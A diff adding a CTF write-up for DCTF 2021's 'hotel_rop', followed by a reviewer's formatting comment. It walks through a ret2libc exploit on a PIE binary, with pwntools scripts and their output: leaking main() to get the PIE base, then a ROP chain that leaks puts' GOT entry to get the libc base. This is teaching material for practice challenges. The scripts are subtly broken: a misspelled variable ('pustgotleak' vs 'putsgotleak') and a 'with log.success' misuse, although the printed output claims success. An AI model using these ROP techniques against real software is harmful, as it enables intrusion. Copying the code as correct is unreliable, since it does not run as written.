content/posts/dctf-2021-hotel-rop-ret2libc-pie.md

```diff
@@ -0,0 +1,282 @@
+
+<br>
+
+## Exploitation
+---
+
+### Stage 1: Calculate PIE base
+
+Since we know that our leak is the address of `main()`, we can easily calculate our offset with `elf.sym.main` and set it as the base_address by saving it to `elf.address`.
+
+```py
+from pwn import *
+
+p = process('./hotel_rop') # run the process
+context.binary = elf = ELF('hotel_rop') # set elf and context
+libc = elf.libc # set libc
+
+with log.progress('Calculating PIE base'): # cool loading bar !
+  p.recvuntil('main street ')
+  mainleak = int(p.recvline().rstrip(b'\n'), 16)
+
+  elf.address = mainleak - elf.sym.main # use elf to save find main address and save PIE base into elf.address
+  with log.success('PIE base @ elf.address')
+```
+
+OUTPUT:
+
+```
+[x] Starting local process './hotel_rop'
+[+] Starting local process './hotel_rop': pid 3631
+[x] Calculating PIE base
+[*] Leak of main: 0x5562e309d36d
+[+] PIE base @ elf.address
+[+] Calculating PIE base: Done
+```
+
+Running the script, we see that we successfully found PIE base.
+
+### Stage 2: Leak and calculate LIBC base
+
+Since LIBC is ASLR-enabled, we also have to calculate the LIBC base. This means we will need a LIBC leak and we will do that in our `rop.chain()`.
+
+We will leak an address from the `GOT` which contains libc addresses, and from there, calculate our libc base address.
+
+Let's write our `rop.chain()`, but without having to find any gadgets or addresses ourselves!!
+
+```py
+from pwn import *
+
+p = process('./hotel_rop') # run the process
+context.binary = elf = ELF('hotel_rop') # set elf and context
+libc = elf.libc # set libc
+
+with log.progress('Stage 1: Calculating PIE base'): # cool loading bar !
+  p.recvuntil(b'main street ')
+  mainleak = int(p.recvline().rstrip(b'\n'), 16)
+
+  elf.address = mainleak - elf.sym.main # use elf to save find main address and save PIE base into elf.address
+  log.success(f'Stage 1 DONE: PIE base @ {hex(elf.address)}')
+
+with log.progress('Stage 2: leaking LIBC address and calculating LIBC base'):
+  rop1 = ROP(elf) # set up rop chain
+  rop1.puts(elf.got.puts) # print global offset table entry for puts
+  rop1.main() # loop back to main
+
+  p.sendline(flat({ 40: rop1.chain()})) # easily find offset in GDB
+  p.recvuntil(b'often.\n')
+
+  pustgotleak = u64(p.recvline().strip(b'\n').ljust(8, b'\x00'))
+  libc.address = putsgotleak - libc.sym.puts
+
+  log.success(f'Stage 2 DONE: libc base @ {hex(libc.address)}')
+```
+
+OUTPUT:
+
+```
+[x] Starting local process './hotel_rop'
+[+] Starting local process './hotel_rop': pid 4558
+
+[x] Stage 1: Calculating PIE base
+[+] PIE base @ 0x55c995a39000
+[+] Stage 1: Calculating PIE base: Done
+
+[x] Stage 2: leaking LIBC address and calculating LIBC base
+[+] libc base @ 0x7f1ab1a60000
+[+] Stage 2: leaking LIBC address and calculating LIBC base: Done

```

Comment:
Use colorized raw HTML, see README.md and other suggestions above (e.g. the `rop1.dump()`)